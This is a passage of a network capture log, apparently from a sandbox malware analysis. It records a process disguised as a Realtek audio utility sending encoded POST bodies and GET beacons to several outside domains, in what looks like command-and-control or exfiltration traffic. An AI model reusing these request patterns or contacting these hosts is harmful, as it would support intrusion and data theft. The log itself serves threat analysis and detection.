cOnShP=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYQpCxSLu12+2akr8dgPlpIwNbYkk1X1uwxasK0XR/+YHNvIU8rE/zI9mDUIvPQAHtD8DUyZXSzsR7LhjOPQtzow341coXsW1zOMuTiBxYJIOrBKMIfLk4zpbNwlqqaYrsYIcMgeXpO6D9SYi74DleXaQEYdFAH6Mcj8hFRgLLFN2hU=
Jan 9, 2025 08:31:15.662391901 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:31:15 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49728	47.83.1.90	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:17.520756006 CET	1289	OUT	POST /nkmx/ HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.givvjn.info Referer: http://www.givvjn.info/nkmx/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 54 57 34 48 59 51 4d 64 49 4b 6e 30 43 4c 2b 73 65 57 33 46 57 6a 79 36 31 69 77 54 7a 67 39 41 73 5a 50 53 70 79 68 38 4c 59 49 70 43 44 4b 4c 76 55 32 2b 78 61 6b 72 39 64 67 53 6c 70 4a 79 4e 62 41 34 6b 31 54 4c 75 79 5a 61 6a 49 38 58 42 4f 2b 59 4f 4e 76 49 63 63 72 42 37 7a 49 6f 6d 44 45 4d 76 4f 67 41 48 74 44 38 44 58 71 5a 54 41 4c 73 4b 37 4c 2b 67 4f 50 6d 37 44 6f 59 33 38 67 72 6f 58 59 73 31 43 75 4d 75 7a 53 42 7a 72 78 49 4d 4c 42 4d 46 59 66 74 6b 34 32 35 62 4e 73 44 71 76 4f 69 72 72 6b 49 4e 61 42 71 48 39 48 73 57 65 36 62 2f 34 73 37 7a 74 33 79 4e 47 68 6a 55 53 58 42 54 36 66 4c 75 48 56 33 62 4f 70 61 76 68 30 68 53 55 63 39 4c 4e 51 59 42 62 46 58 4b 4f 65 5a 64 46 32 48 76 73 5a 78 67 44 76 4e 62 2b 4e 41 55 33 4e 64 51 38 30 55 49 63 6c 37 4f 73 72 73 73 74 5a 49 5a 62 6f 51 6b 37 68 52 51 46 66 71 37 31 53 47 4f 34 74 52 47 70 59 72 34 41 41 76 4a 59 42 37 6b 45 4c 74 4c 52 66 38 73 63 2f 58 4b 7a 50 4a 67 55 32 63 52 43 49 30 48 6c 56 6c 64 6f 4b [TRUNCATED] Data Ascii: cOnShP=TW4HYQMdIKn0CL+seW3FWjy61iwTzg9AsZPSpyh8LYIpCDKLvU2+xakr9dgSlpJyNbA4k1TLuyZajI8XBO+YONvIccrB7zIomDEMvOgAHtD8DXqZTALsK7L+gOPm7DoY38groXYs1CuMuzSBzrxIMLBMFYftk425bNsDqvOirrkINaBqH9HsWe6b/4s7zt3yNGhjUSXBT6fLuHV3bOpavh0hSUc9LNQYBbFXKOeZdF2HvsZxgDvNb+NAU3NdQ80UIcl7OsrsstZIZboQk7hRQFfq71SGO4tRGpYr4AAvJYB7kELtLRf8sc/XKzPJgU2cRCI0HlVldoKYvJCtlS7eWmt6rdghCkHY8hWAO4inU3/up73InoWYO1ZzU+wqvmDpkbQoRPPgKKzA/R2QqpCgxC8k6PWIr6GaZjmEjPhwRWlJt5JuoCrKcEpG6E1S4QxFCJvR9eYcvksT2G9m0zhhbkeYwm4faEMMMWchO1RKXRaGVfFomGfn6KgdUHFnQ3fnT+ZXl3JGwacKEQpzerZp+HrTvTz/U5qWVZA2LzbaUR8gHzeQnEWY430fZ0x+s1TirXALCgy2udthlheVtPTzz7z1lezsxt6UZsXlbQVTNJ5Q+B2eh3Jhi/rgCJVOE4slw9vew3dB/ZHtZn/7z+p1hdSn0oCJ4bMgDqh3Bzz2GWSQaYfd
Jan 9, 2025 08:31:17.520816088 CET	6676	OUT	Data Raw: 75 63 69 6d 30 6f 46 75 6e 4d 53 42 4a 73 33 49 44 52 77 59 74 55 51 54 53 6d 4c 6d 73 52 2b 43 37 33 75 34 74 72 54 6b 39 42 4d 77 6b 64 6f 57 36 4a 30 41 32 50 64 4f 48 54 35 71 36 71 59 48 57 35 59 4a 51 31 70 30 46 73 51 32 6a 56 4e 4e 6d 61 Data Ascii: ucim0oFunMSBJs3IDRwYtUQTSmLmsR+C73u4trTk9BMwkdoW6J0A2PdOHT5q6qYHW5YJQ1p0FsQ2jVNNmaTNdIjVECmxlrwBqER1dS+tGtaqSXWeSu6UEP0VEvcVYt9oJWoDJQieVA24aiehWmTjRW/bVvZsjAzLWT3mI3U4Gimd2yINu82cVe45mqtIUBTDRGugBbJTR11wYsdI1YTWNnqLa5VI4QC+c3UCeyzy19RfDTl3Ooi
Jan 9, 2025 08:31:18.507646084 CET	137	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:31:18 GMT Transfer-Encoding: chunked Connection: close Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49729	47.83.1.90	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:20.364701986 CET	539	OUT	GET /nkmx/?cOnShP=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&NvA=qUwPQPTQmTwyizTU HTTP/1.1 Host: www.givvjn.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:31:21.375008106 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Thu, 09 Jan 2025 07:31:21 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49730	13.248.169.48	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:26.722218037 CET	799	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 32 2b 44 57 51 41 42 74 51 2b 53 4c 35 56 7a 64 57 41 53 43 33 4a 36 67 50 47 48 4d 75 41 41 33 4a 68 2b 58 4f 30 36 52 4d 36 32 71 56 51 4b 2b 74 54 51 38 52 33 62 38 4e 76 77 43 33 7a 51 64 34 51 55 38 73 54 2b 66 78 2f 33 6c 35 2f 42 55 30 6d 41 78 32 56 70 4e 33 52 67 72 74 57 7a 4e 6b 44 45 4a 44 46 4d 74 7a 64 6e 30 63 6f 67 68 6c 73 4b 6d 66 6a 35 6a 67 4a 4a 67 67 4f 73 54 6b 48 44 47 79 41 51 4c 54 6b 75 39 38 31 43 66 65 74 45 50 75 4b 71 6c 49 49 70 66 70 4e 78 79 73 35 57 2b 6b 55 78 57 39 43 4d 31 4f 46 58 67 30 4e 2b 33 48 77 3d 3d Data Ascii: cOnShP=C3faYkUc5r8U2+DWQABtQ+SL5VzdWASC3J6gPGHMuAA3Jh+XO06RM62qVQK+tTQ8R3b8NvwC3zQd4QU8sT+fx/3l5/BU0mAx2VpN3RgrtWzNkDEJDFMtzdn0coghlsKmfj5jgJJggOsTkHDGyAQLTku981CfetEPuKqlIIpfpNxys5W+kUxW9CM1OFXg0N+3Hw==
Jan 9, 2025 08:31:26.858319998 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49731	13.248.169.48	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:29.393624067 CET	819	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 31 51 33 4a 46 36 58 63 42 61 52 4c 36 32 71 65 77 4b 37 69 7a 51 4e 52 33 58 72 4e 74 30 43 33 33 34 64 34 51 45 38 73 67 58 74 77 76 33 6e 67 50 42 53 37 47 41 78 32 56 70 4e 33 58 4e 4f 74 57 37 4e 6c 77 4d 4a 44 6b 4d 75 79 64 6e 31 66 6f 67 68 30 38 4b 69 66 6a 35 52 67 49 56 4f 67 4e 55 54 6b 47 7a 47 79 52 52 35 49 55 76 34 32 56 44 39 61 4f 35 41 6e 36 53 53 46 59 64 48 68 74 78 51 67 50 62 6b 35 6d 46 79 2b 52 51 48 4b 31 75 49 32 50 2f 73 61 2b 52 66 45 46 4a 71 46 68 55 62 51 6b 58 78 4f 76 37 61 38 64 45 3d Data Ascii: cOnShP=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct1Q3JF6XcBaRL62qewK7izQNR3XrNt0C334d4QE8sgXtwv3ngPBS7GAx2VpN3XNOtW7NlwMJDkMuydn1fogh08Kifj5RgIVOgNUTkGzGyRR5IUv42VD9aO5An6SSFYdHhtxQgPbk5mFy+RQHK1uI2P/sa+RfEFJqFhUbQkXxOv7a8dE=
Jan 9, 2025 08:31:29.529350042 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49732	13.248.169.48	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:32.068440914 CET	2578	OUT	POST /t3iv/ HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.bonheur.tech Referer: http://www.bonheur.tech/t3iv/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 43 33 66 61 59 6b 55 63 35 72 38 55 6b 4b 48 57 44 33 64 74 42 65 53 49 38 56 7a 64 64 67 53 47 33 4a 32 67 50 43 66 63 74 32 77 33 4b 77 75 58 4f 51 61 52 4b 36 32 71 43 67 4b 36 69 7a 51 51 52 33 50 6e 4e 74 35 33 33 78 38 64 2b 44 38 38 71 56 72 74 6c 2f 33 6e 6f 76 42 58 30 6d 41 6b 32 56 35 4a 33 58 39 4f 74 57 37 4e 6c 78 63 4a 58 6c 4d 75 2f 39 6e 30 63 6f 67 39 6c 73 4c 46 66 6a 77 6d 67 49 42 77 6a 39 30 54 6b 6d 6a 47 31 6a 35 35 45 55 76 32 31 56 44 62 61 4f 30 41 6e 37 2b 34 46 59 70 35 68 73 35 51 77 4a 44 37 6a 33 70 37 72 48 51 4a 41 55 32 78 36 4e 33 43 45 4d 68 77 46 6d 70 36 4b 30 41 66 54 79 58 59 61 50 62 6a 68 61 7a 7a 7a 36 36 66 32 4a 6a 67 52 6a 61 49 35 70 55 51 65 65 79 34 31 71 53 5a 62 65 79 64 4a 6c 64 53 6c 37 73 74 50 38 62 51 6e 77 69 30 54 35 4f 52 67 6d 6f 71 42 52 49 45 6d 77 4b 72 32 73 6f 52 70 76 6f 52 43 41 64 32 4f 61 78 6b 4c 55 6b 2f 5a 6b 64 6d 6a 55 4e 4c 79 65 58 55 76 53 4f 33 49 2b 42 32 69 71 4e 34 6a 48 71 37 74 59 35 61 4a 55 43 [TRUNCATED] Data Ascii: cOnShP=C3faYkUc5r8UkKHWD3dtBeSI8VzddgSG3J2gPCfct2w3KwuXOQaRK62qCgK6izQQR3PnNt533x8d+D88qVrtl/3novBX0mAk2V5J3X9OtW7NlxcJXlMu/9n0cog9lsLFfjwmgIBwj90TkmjG1j55EUv21VDbaO0An7+4FYp5hs5QwJD7j3p7rHQJAU2x6N3CEMhwFmp6K0AfTyXYaPbjhazzz66f2JjgRjaI5pUQeey41qSZbeydJldSl7stP8bQnwi0T5ORgmoqBRIEmwKr2soRpvoRCAd2OaxkLUk/ZkdmjUNLyeXUvSO3I+B2iqN4jHq7tY5aJUCiiknmREZA9cZcJkDO2+6oD/LVa2d15kffj9dR6J5GJ07aWok6vBILgh79bpV52H+cR+RE+UczrNL+4F0/w+f4EeShNuSZAyM/94xHEvT1ze5ORCDvmft4wdGDmNiNBkcMbEqG8uyxdDWD49kiEFlR5Lrtao8BOfU0vPvkKhgVPJ6AgcIfM3hrlry9drRguaUok91QHWpywFR0fc9fUUK+LR5nrYHYRNsWpred7L7Kw8aw9VCan1w0kDZrppLXc9PKNe4z6E6QsbfA3orN/rzanbrZVtD3A46lioLf6j0hXFupgIe0UmmQBc+S8qMPedqF7Jodn+xK4UqThoSK+SEtY8umi+qmd5qNuB/mntP3zCGbNBtQfyXupVJCwsPzpLPToP2Hw6oCvhqhS5vCntXxHrwJkYMkKusSCoVzWHSm3VuqJeWGAQbAFLr7ASGlEA940EcKSKqMhARluC4d6MA4QwVGg722mHYfLDXQ7Ib5Vk/XZJrfCeJKJKK8iGxKX1nUtjgaA4hK0V+PHmn1P6H7rzG77xV6g2Q7OjIiIWCM3q1d22eIUVXXFtz8NhIAT4O5qVgW88go0uqbXlqak0PrLNo7VUC3Rmeyzcvu50RVcANF3Yz7+MEbYmGmGmfxM3xkT2aF+IELIP4osdI/4xP7xrpMQFk21H7YS [TRUNCATED]
Jan 9, 2025 08:31:32.068500996 CET	5390	OUT	Data Raw: 73 58 30 34 4f 73 69 79 32 2b 71 71 48 2b 59 6e 35 45 43 77 4c 4d 45 6a 2b 45 77 66 42 6e 44 33 79 63 31 69 74 44 2b 63 6d 4f 6d 77 53 66 77 77 55 54 55 2b 53 65 50 39 42 37 75 76 52 36 71 4a 6a 42 4b 4c 38 4a 58 68 62 6f 54 72 4d 37 43 45 2f 57 Data Ascii: sX04Osiy2+qqH+Yn5ECwLMEj+EwfBnD3yc1itD+cmOmwSfwwUTU+SeP9B7uvR6qJjBKL8JXhboTrM7CE/WLKXFxN1oxq4x3145yC29QWGt71TcHLBFXfLGEyHDrmAvmy94dJihsZnOJD8pg3/9TwDSXm6MTgSvKK4b7VwJ39ltDPo1H11NEKBhGIpkZCtGZ9o84PEhrDpChE3wpt7tKu42LIwVCRUKm4581LQFFYj6X3Ugs2BFm
Jan 9, 2025 08:31:32.204917908 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49733	13.248.169.48	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:34.737024069 CET	540	OUT	GET /t3iv/?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc= HTTP/1.1 Host: www.bonheur.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 9, 2025 08:31:34.876507998 CET	384	IN	HTTP/1.1 200 OK content-type: text/html date: Thu, 09 Jan 2025 07:31:34 GMT content-length: 263 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4e 76 41 3d 71 55 77 50 51 50 54 51 6d 54 77 79 69 7a 54 55 26 63 4f 6e 53 68 50 3d 50 31 33 36 62 53 59 77 2f 62 6f 69 6e 36 75 74 45 42 5a 37 50 4c 43 36 38 32 44 59 47 51 48 6b 39 71 4b 4c 65 54 6d 58 72 57 41 65 50 79 61 48 54 53 44 4d 46 6f 61 75 42 54 57 78 30 69 67 31 53 33 43 56 46 73 78 33 30 69 55 74 6a 52 56 51 69 42 79 35 35 49 33 59 70 39 39 47 68 33 6b 6b 38 48 35 48 32 41 45 4d 71 6b 57 42 36 67 6b 69 53 48 41 44 77 50 63 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?NvA=qUwPQPTQmTwyizTU&cOnShP=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.11.20	49734	160.25.166.123	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:40.901489019 CET	787	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 78 7a 39 6d 75 4f 35 64 48 50 31 76 52 6e 35 43 38 56 44 71 6a 50 65 4b 42 58 6e 66 38 50 4a 78 2b 34 2f 75 68 69 7a 41 35 62 35 36 52 46 57 4d 6e 71 52 37 6b 69 6c 32 34 4d 4a 53 32 63 78 4d 30 55 44 4e 32 67 74 66 6a 68 74 57 56 6f 35 4a 61 48 50 5a 63 31 4b 7a 6f 77 78 4e 41 46 73 53 4c 4d 48 33 5a 51 58 78 68 4a 54 51 49 52 48 72 2f 30 37 6a 42 39 72 68 31 6c 36 52 67 70 66 43 6b 2f 45 75 6d 66 72 7a 75 72 48 30 36 47 4a 6b 48 30 39 44 58 75 62 6b 36 58 4a 65 47 56 2b 42 72 76 70 41 67 33 4b 53 53 6f 38 33 67 6e 37 37 4a 63 61 31 7a 41 3d 3d Data Ascii: cOnShP=On/0Uk0gKlcgxz9muO5dHP1vRn5C8VDqjPeKBXnf8PJx+4/uhizA5b56RFWMnqR7kil24MJS2cxM0UDN2gtfjhtWVo5JaHPZc1KzowxNAFsSLMH3ZQXxhJTQIRHr/07jB9rh1l6RgpfCk/EumfrzurH06GJkH09DXubk6XJeGV+BrvpAg3KSSo83gn77Jca1zA==
Jan 9, 2025 08:31:41.262991905 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:31:41 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 9, 2025 08:31:41.263001919 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.11.20	49735	160.25.166.123	80	7360	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 08:31:43.785099983 CET	807	OUT	POST /bwjl/ HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.rpa.asia Referer: http://www.rpa.asia/bwjl/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 63 4f 6e 53 68 50 3d 4f 6e 2f 30 55 6b 30 67 4b 6c 63 67 6a 43 4e 6d 68 4e 52 64 47 76 31 73 66 48 35 43 70 6c 44 6d 6a 50 61 4b 42 56 4c 50 38 39 64 78 39 63 7a 75 67 67 4c 41 38 62 35 36 65 6c 58 49 34 36 51 57 6b 69 68 45 34 4a 70 53 32 63 6c 4d 30 56 7a 4e 32 54 46 63 78 42 74 55 4f 34 35 48 55 6e 50 5a 63 31 4b 7a 6f 77 4d 67 41 45 45 53 49 38 33 33 61 78 58 79 73 70 54 54 66 68 48 72 70 30 37 76 42 39 71 30 31 6b 6d 37 67 76 44 43 6b 2b 30 75 6d 4f 72 77 67 72 48 74 30 6d 49 4d 50 47 30 37 4f 2b 2f 6d 71 47 38 48 48 41 36 6c 6a 5a 6b 61 39 46 2b 32 52 37 67 46 6b 58 43 54 4c 65 62 75 75 49 4d 76 39 57 7a 31 42 35 7a 58 39 74 74 61 55 6f 63 66 6d 39 49 3d Data Ascii: cOnShP=On/0Uk0gKlcgjCNmhNRdGv1sfH5CplDmjPaKBVLP89dx9czuggLA8b56elXI46QWkihE4JpS2clM0VzN2TFcxBtUO45HUnPZc1KzowMgAEESI833axXyspTTfhHrp07vB9q01km7gvDCk+0umOrwgrHt0mIMPG07O+/mqG8HHA6ljZka9F+2R7gFkXCTLebuuIMv9Wz1B5zX9ttaUocfm9I=
Jan 9, 2025 08:31:44.145174980 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Thu, 09 Jan 2025 07:31:43 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; 